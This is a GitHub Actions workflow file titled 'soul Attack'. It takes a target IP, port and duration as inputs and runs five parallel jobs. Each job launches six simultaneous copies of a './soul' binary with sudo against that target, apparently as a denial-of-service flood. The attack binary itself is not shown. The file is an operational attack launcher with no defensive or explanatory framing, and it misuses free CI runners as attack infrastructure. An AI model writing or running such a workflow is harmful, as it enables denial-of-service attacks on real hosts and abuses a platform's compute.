name: soul Attack
on:
  workflow_dispatch:
    inputs:
      ip:
        description: 'Target IP'
        required: true
      port:
        description: 'Target Port'
        required: true
      time:
        description: 'Attack Duration'
        required: true

jobs:
  soul:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        n: [1, 2, 3, 4, 5]
    steps:
    - uses: actions/checkout@v4
      with:
        fetch-depth: 1
    - run: |
        chmod +x *
        for i in {1..6}; do
          sudo ./soul ${{ github.event.inputs.ip }} ${{ github.event.inputs.port }} ${{ github.event.inputs.time }} 999 &
        done
        wait
